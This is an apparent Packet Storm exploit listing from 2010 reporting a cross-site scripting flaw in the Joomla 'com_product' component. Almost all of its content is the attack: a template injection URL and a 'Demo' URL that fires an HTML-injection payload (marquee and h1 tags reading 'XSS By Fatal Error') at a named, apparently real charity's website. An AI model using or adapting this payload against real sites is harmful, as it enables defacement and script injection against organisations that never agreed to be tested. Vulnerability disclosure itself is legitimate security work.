Joomla Product Cross Site Scripting

2010-05-18T00:00:00
ID PACKETSTORM:89591
Type packetstorm
Reporter s4r4d0
Modified 2010-05-18T00:00:00

Description

                                        
                                            `[x] Joomla Component Product  
[x] Date: 15/05/2010  
[x] Author: s4r4d0  
[x] Contact: s4r4d0@yahoo.com  
[x] Team; Fatal Error  
[x] Bug: XSS on Component Product   
[x] Example: http://www.site.com/index.php?option=com_product=[XSS]  
[x] Demo: http://www.breastcancercampaign.org/index.php?option=com_product=">><marquee><h1>XSS By Fatal Error</h1><marquee>  
[x] Made in Brazil  
  
  
  
  
  
  
  
  
  
  
  
  
`